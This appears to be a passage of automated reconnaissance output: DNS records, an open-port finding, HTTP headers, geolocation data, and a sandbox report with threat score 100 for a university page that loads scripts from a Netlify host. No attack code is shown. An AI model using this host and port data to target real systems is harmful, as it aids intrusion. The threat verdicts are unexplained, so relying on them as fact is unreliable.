"2023-03-09T12:06:41.806917383Z"}, "adoring-lichterman-6e1b2c.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-09T20:24:20.566234881Z"}, "aaronmbdev-website.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-15T12:07:03.899811400Z"}, "live-polls.patootie.app": {"record_type": "CNAME", "resolved_at": "2023-03-11T12:07:56.159742549Z"}, "elastic-ramanujan-e0ad25.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-14T12:06:33.631556287Z"}, "four13-ops-app-prod.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-11T12:07:42.998596444Z"}, "cupomonline.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-09T12:06:38.920516396Z"}, "awu4jxor2d.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-15T12:07:09.638707720Z"}, "fervent-mccarthy-4b3659.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-14T12:07:10.401148413Z"}, "szc188.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-19T21:38:20.959762527Z"}, "moonlit-buttercream-62c2ba.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-12T12:07:44.779880090Z"}, "summit.openstack.cn": {"record_type": "CNAME", "resolved_at": "2023-03-07T12:48:19.061204208Z"}, "www.healthymind.ai": {"record_type": "AAAA", "resolved_at": "2023-04-19T14:06:38.547519064Z"}, "fisheye-devdocs.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-16T00:14:03.646864570Z"}, "bullseye-admin.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-09T20:24:27.696168878Z"}, "www.wenyouwang.cn": {"record_type": "CNAME", "resolved_at": "2023-04-29T13:01:34.861621993Z"}, "noel-port.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-20T18:06:40.472919704Z"}, "agitated-montalcini-0f8ddc.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-19T21:38:02.220099521Z"}, "awesome-jones-c007a7.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-18T12:08:00.284410270Z"}, "client-v3-prod.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-18T19:28:22.911126012Z"}, "brave-borg-aef0af.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-22T06:56:58.555640984Z"}, "leafy-beijinho-b1ff73.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-22T17:34:44.565666088Z"}, "cenos-docs-antennas.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-22T15:32:55.497984285Z"}, "tubul | 2600:1f18:2489:8200::c8 |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 36459 | 185.199.109.0/24 |
| 2023-05-12 03:11:16 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'London', u'security': {u'is_vpn': False}, u'city_geoname_id': 2643743, u'region_geoname_id': 6269131, u'country': u'United States', u'region': u'England', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'CloudFLARENET-EU', u'organization_name': None, u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'W1B', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'22:11:15'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2a06:98c1:3120::1', u'continent': u'North America', u'region_iso_code': u'ENG'} | 2a06:98c1:3120::1 |
| 2023-05-12 02:54:30 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 64.226.81.43:22 | 64.226.81.43 |
| 2023-05-12 02:54:13 | HTTP Headers | No | Web Spider | 10 | 0 | 1 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} | ayhu.xyz |
| 2023-05-12 02:54:38 | Raw Data from RIRs | No | Censys | 0 | 0 | 3 | 0 | None | {"last_updated_at": "2023-05-11T22:46:19.213Z", "ip": "172.67.168.252", "location_updated_at": "2023-05-11T18:33:28.301878Z", "autonomous_system_updated_at": "2023-05-09T15:05:11.305022Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"mail.dailytungipara.com": {"record_type": "A", "resolved_at": "2023-04-30T19:46:55.929914113Z"}, "www.5000miles.org": {"record_type": "A", "resolved_at": "2023-04-30T18:13:58.091307621Z"}, "vrukshali.com": {"record_type": "A", "resolved_at": "2023-04-08T16:35:57.455101722Z"}, "micojardihori.tk": {"record_type": "A", "resolved_at": "2023-05-05T20:23:43.915610757Z"}, "webmail.plafonpvcklaten.com": {"record_type": "A", "resolved_at": "2022-10-23T13:56:03.189903700Z"}, "aphausomaharli.gq": {"record_type": "A", "resolved_at": "2023-05-03T00:41:30.483254854Z"}, "urposnasulebas.tk": {"record_type": "A", "resolved_at": "2023-05-03T21:59:06.417667953Z"}, "smartshorties.com": {"record_type": "A", "resolved_at": "2023-05-08T16:08:44.911393475Z"}, "newbabyswing.com": {"record_type": "A", "resolved_at": "2023-01-14T15:30:21.414055738Z"}, "www.myobots.com": {"record_type": "A", "resolved_at": "2023-04-09T14:51:23.310423040Z"}, "portsaintjoescallopingcharters.com": {"record_type": "A", "resolved_at": "2023-04-21T15:46:43.176740366Z"}, "beautifytopsultimation.buzz": {"record_type": "A", "resolved_at": "2022-11-17T12:23:28.036579596Z"}, "www.searchtermresults.com": {"record_type": "A", "resolved_at": "2023-04-29T15:52:34.091641640Z"}, "demedetomi.cf": {"record_type": "A", "resolved_at": "2023-04-28T13:02:53.957272859Z"}, "kasabugraphics.com": {"record_type": "A", "resolved_at": "2023-05-01T14:43:01.025149560Z"}, "ope8.tv": {"record_type": "A", "resolved_at": "2023-05-03T22:04:13.875331255Z"}, "cpanel.dailytungipara.com": {"record_type": "A", "resolved_at": "2023-05-04T14:36:47.242935150Z"}, "sgenundia.tk": {"record_type": "A", "resolved_at": "2023-03-24T07:24:26.513019486Z"}, "rigophogisvito.tk": {"record_type": "A", "resolved_at": "2023-04-22T20:38:42.905568413Z"}, "www.kjgenerationministries.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-10T18:40:04.194871729Z"}, "take2s.com": {"record_type": "A", "resolved_at": "2023-04-13T01:23:15.149064879Z"}, "remenhillcockvu.ml": {"record_type": "A", "resolved_at": "2023-04-23T18:26:05.960236771Z"}, "grrrlhub.com": {"record_type": "A", "resolved_at": "2023-05-06T15:01:46.516202883Z"}, "tilimotica.ml": {"record_type": "A", "resolved_at": "2023-05-07T18:36:13.077272212Z"}, "mistwarctolylong.tk": {"record_type": "A", "resolved_at": "2023-05-09T21:26:33.070368065Z"}, "liaromispepun.cf": {"record_type": "A", "resolved_at": "2023-05-09T12:55:45.304346039Z"}, "yarmun.ru": {"record_type": "A", "resolved_at": "2022-11-24T10:10:59.048282776Z"}, "www.plafonpvcklaten.com": {"record_type": "A", "resolved_at": "2022-10-24T22:38:44.245072355Z"}, "topcourse.org": {"record_type": "A", "resolved_at": "2023-05-03T21:16:34.517625638Z"}, "ningchartjump.ml": {"record_type": "A", "resolved_at": "2023-01-07T15:35:22.698042631Z"}, "it-a-br-newcarok.live": {"record_type": "A", "resolved_at": "2023-04-29T18:23:19.166151443Z"}, "24hrupdate.online": {"record_type": "A", "resolved_at": "2023-03-02T19:07:43.323480368Z"}, "control.vipe.us": {"record_type": "A", "resolved_at": "2023-04-29T21:53:25.082390823Z"}, "jocworkvi.tk": {"record_type": "A", "resolved_at": "2023-04-19T23:39:03.920122991Z"}, "cienciaexamanismo.com.br": {"record_type": "A", "resolved_at": "2022-10-22T20:43:17.637185692Z"}, "www.farasoacademy.com": {"record_type": "A", "resolved_at": "2023-04-24T14:37:26.546680400Z"}, "tiketpabe.ml": {"record_type": "A", "resolved_at": "2022-12-20T15:20:04.499578994Z"}, "slanchogled.vipe.us": {"record_type": "A", "resolved_at": "2023-05-07T10:10:31.489137012Z"}, "www.septlightchristministries.org.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-05-05T18:22:49.197349430Z"}, "www.seki.ro": {"record_type": "A", "resolved_at": "2023-05-03T21:28:23.180761483Z"}, "nnfejv-dkfe.valentiona890.workers.dev": {"record_type": "A", "resolved_at": "2023-04-14T21:16:09.910917494Z"}, "ydemle.tk": {"record_type": "A", "resolved_at": "2023-05-03T04:55:08.861274859Z"}, "gjtyew-bodf.valentiona890.workers.dev": {"record_type": "A", "resolved_at": "2023-04-20T20:28:09.792148401Z"}, "www.septlightchristministries.org": {"record_type": "CNAME", "resolved_at": "2022-11-14T16:33:28.688596487Z"}, "www.brevardnc.org": {"record_type": "A", "resolved_at": "2023-05-07T21:13:44.303349330Z"}, "reistomam.ml": {"record_type": "A", "resolved_at": "2023-04-04T19:32:24.563529019Z"}, "businesscreditcarddeal.com": {"record_type": "A", "resolved_at": "2023-04-30T19:35:33.121417755Z"}, "plafonpvcklaten.com": {"record_type": "A", "resolved_at": "2022-11-07T13:56:43.968941354Z"}, "prechcamithotem.ga": {"record_type": "A", "resolved_at": "2023-04-28T18:15:48.598414983Z"}, "cvgy.top": {"record_type": "A", "resolved_at": "2023-05-03T04:55:52.694688313Z"}, "road.vipe.us": {"record_type": "A", "resolved_at": "2023-05-05T20:38:50.973706563Z"}, "www.clicarmoires.ca": {"record_type": "A", "resolved_at": "2023-04-17T17:46:34.291559938Z"}, "venoqymoty.gq": {"record_type": "A", "resolved_at": "2023-05-03T00:41:48.616482387Z"}, "marchailil.gq": {"record_type": "A", "resolved_at": "2022-12-16T14:41:33.935986410Z"}, "youshareproject.com": {"record_type": "A", "resolved_at": "2023-05-05T16:03:41.028406500Z"}, "www.youshareproject.com": {"record_type": "A", "resolved_at": "2023-05-07T16:20:45.109859563Z"}, "cakedefi.ru": {"record_type": "A", "resolved_at": "2023-05-05T20:07:14.309451071Z"}, "terrtus.ch": {"record_type": "A", "resolved_at": "2023-05-11T12:57:19.817455256Z"}, "bestverfyspport.xyz": {"record_type": "A", "resolved_at": "2022-12-01T17:11:53.237569857Z"}, "cdn-0.babeenineurope.com": {"record_type": "CNAME", "resolved_at": "2023-05-05T14:02:23.133300194Z"}, "asexloyndicla.tk": {"record_type": "A", "resolved_at": "2023-05-11T21:41:02.129956664Z"}, "evipesli.cf": {"record_type": "A", "resolved_at": "2023-05-01T12:47:01.066595854Z"}, "marwiwealolo.tk": {"record_type": "A", "resolved_at": "2023-05-09T21:26:23.147927370Z"}, "aqonecsymtuite.cf": {"record_type": "A", "resolved_at": "2023-05-02T19:49:39.573463922Z"}, "luigisitalianrestaurantuvalde.com": {"record_type": "A", "resolved_at": "2023-04-27T15:46:08.997890816Z"}, "beleukemiatip.live": {"record_type": "A", "resolved_at": "2023-04-24T18:39:32.424276429Z"}, "cpcalendars.seki.ro": {"record_type": "A", "resolved_at": "2023-01-29T20:35:39.444163903Z"}, "tizhoo.ir": {"record_type": "A", "resolved_at": "2022-12-14T15:27:25.652479467Z"}, "smartarena.vipe.us": {"record_type": "A", "resolved_at": "2023-05-03T22:17:28.866034171Z"}, "powernet.asia": {"record_type": "A", "resolved_at": "2023-05-10T12:19:53.194054542Z"}, "cosmicstory.info": {"record_type": "A", "resolved_at": "2022-09-26T02:33:11.327006722Z"}, "www.dailytungipara.com": {"record_type": "A", "resolved_at": "2023-04-26T14:47:46.439798109Z"}, "dev.wrightelliot.co.uk": {"record_type": "A", "resolved_at": "2023-05-05T20:36:24.562768060Z"}, "sterrecgondtic.cf": {"record_type": "A", "resolved_at": "2023-03-28T12:41:12.485923868Z"}, "www.kjgenerationministries.com": {"record_type": "CNAME", "resolved_at": "2022-12-05T13:35:30.694998001Z"}, "abkapp.vipe.us": {"record_type": "A", "resolved_at": "2023-04-16T21:06:58.495246539Z"}, "master-forex-v.com": {"record_type": "A", "resolved_at": "2023-05-02T15:28:26.304610299Z"}, "maturewell.org": {"record_type": "A", "resolved_at": "2023-05-07T21:17:46.109575572Z"}, "stocabpenope.tk": {"record_type": "A", "resolved_at": "2023-05-04T22:27:09.028863323Z"}, "martohacabe.ga": {"record_type": "A", "resolved_at": "2023-05-07T17:27:25.826314650Z"}, "www.terrtus.ch": {"record_type": "A", "resolved_at": "2023-04-28T13:06:01.112458353Z"}, "tiabolihochwildpa.tk": {"record_type": "A", "resolved_at": "2023-04-23T21:28:52.237979185Z"}, "rensumexiberk.ml": {"record_type": "A", "resolved_at": "2023-05-03T01:55:35.944855020Z"}, "mail.plafonpvcklaten.com": {"record_type": "A", "resolved_at": "2022-10-27T14:03:01.187052953Z"}, "www.comunicacaodedados.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2023-04-13T18:07:05.732544519Z"}, "lenscarspock.tk": {"record_type": "A", "resolved_at": "2023-05-11T21:41:33.881756893Z"}, "rec.vipe.us": {"record_type": "A", "resolved_at": "2023-04-30T03:14:09.561279109Z"}, "mail.pitubasolflat.com": {"record_type": "A", "resolved_at": "2023-05-06T15:53:33.146143534Z"}, "rotaryclubdeitaguaje.org.br": {"record_type": "A", "resolved_at": "2023-05-07T12:43:12.589324662Z"}, "trakagcicsalutci.tk": {"record_type": "A", "resolved_at": "2023-05-01T20:45:54.004504568Z"}, "www.vrukshali.com": {"record_type": "A", "resolved_at": "2023-05-08T16:37:33.689821521Z"}, "www.24hrupdate.online": {"record_type": "A", "resolved_at": "2023-03-22T20:33:59.416609462Z"}, "brockhoff.fr": {"record_type": "A", "resolved_at": "2023-04-30T22:44:30.853447549Z"}, "factoryoutletusa.shop": {"record_type": "A", "resolved_at": "2023-03-30T07:59:51.872078107Z"}, "tinghoxad.tk": {"record_type": "A", "resolved_at": "2023-04-19T23:40:24.408979445Z"}, "tournleadnabatemo.tk": {"record_type": "A", "resolved_at": "2023-04-19T23:40:16.541179614Z"}, "5000miles.org": {"record_type": "A", "resolved_at": "2023-05-03T21:08:08.392120085Z"}, "arpaman.ga": {"record_type": "A", "resolved_at": "2022-10-21T07:33:02.998113361Z"}, "vikk-play.space": {"record_type": "A", "resolved_at": "2023-01-29T18:05:12.078217209Z"}, "bitfari.net": {"record_type": "A", "resolved_at": "2023-05-03T02:29:48.944022709Z"}}, "names": ["brockhoff.fr", "youshareproject.com", "arpaman.ga", "sgenundia.tk", "tiabolihochwildpa.tk", "cienciaexamanismo.com.br", "yarmun.ru", "powernet.asia", "marchailil.gq", "cpanel.dailytungipara.com", "rigophogisvito.tk", "control.vipe.us", "aphausomaharli.gq", "rensumexiberk.ml", "www.septlightchristministries.org", "vikk-play.space", "www.terrtus.ch", "cvgy.top", "5000miles.org", "www.bre | 172.67.168.252 |
| 2023-05-12 02:56:41 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_a04_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_a04_IESQMMUTEX_0_331"\n "IsoScope_a04_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_a04_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2564"\n "IsoScope_a04_IE_EarlyTabStart_0xe64_Mutex"\n "IsoScope_a04_ConnHashTable<2564>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"150.214.110.212:443"\n "18.160.96.90:443"\n "142.250.31.95:443"\n "172.64.133.15:443"\n "104.17.24.14:443"\n "35.229.48.116:443"\n "151.101.1.91:443"\n "172.253.115.94:443"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /investiga/grupos/FQM346/?post%2CnjOkEHgROA4 HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.uco.es\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /investiga/grupos/FQM346/?post%2CnjOkEHgROA4 HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.uco.es\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: www.uco.es\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: www.uco.es\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /css2?family=Nunito:wght@400;600&display=swap HTTP/1.1\nAccept: text/css, */*\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /css2?family=Nunito:wght@400;600&display=swap HTTP/1.1\nAccept: text/css, */*\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /releases/v5.15.2/css/all.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: use.fontawesome.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /releases/v5.15.2/css/all.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: use.fontawesome.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /releases/v5.15.2/webfonts/fa-regular-400.eot? HTTP/1.1\nAccept: */*\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://www.uco.es\nAccept-Encoding: gzip, deflate\nHost: use.fontawesome.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /releases/v5.15.2/webfonts/fa-regular-400.eot? HTTP/1.1\nAccept: */*\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://www.uco.es\nAccept-Encoding: gzip, deflate\nHost: use.fontawesome.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /releases/v5.15.2/webfonts/fa-solid-900.eot? HTTP/1.1\nAccept: */*\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://www.uco.es\nAccept-Encoding: gzip, deflate\nHost: use.fontawesome.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /releases/v5.15.2/webfonts/fa-solid-900.eot? HTTP/1.1\nAccept: */*\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://www.uco.es\nAccept-Encoding: gzip, deflate\nHost: use.fontawesome.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /ajax/libs/mediaelement/4.2.16/mediaelementplayer.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: cdnjs.cloudflare.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /ajax/libs/mediaelement/4.2.16/mediaelementplayer.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: cdnjs.cloudflare.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /ajax/libs/mediaelement/4.2.16/mediaelement-and-player.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: cdnjs.cloudflare.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /ajax/libs/mediaelement/4.2.16/mediaelement-and-player.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: cdnjs.cloudflare.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /center.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: js-adso.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /center.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: js-adso.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /vert.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: js-adso.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /vert.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: js-adso.netlify.app\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshRTA.woff HTTP/1.1\nAccept: */*\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://www.uco.es\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshRTA.woff HTTP/1.1\nAccept: */*\nReferer: https://www.uco.es/investiga/grupos/FQM346/?post%2CnjOkEHgROA4\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://www.uco.es\nAccept-Encod | 35.229.48.116 |
| 2023-05-12 02:54:19 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://fluid.battleb0t.xyz/gp_badge.png | https://fluid.battleb0t.xyz/ |
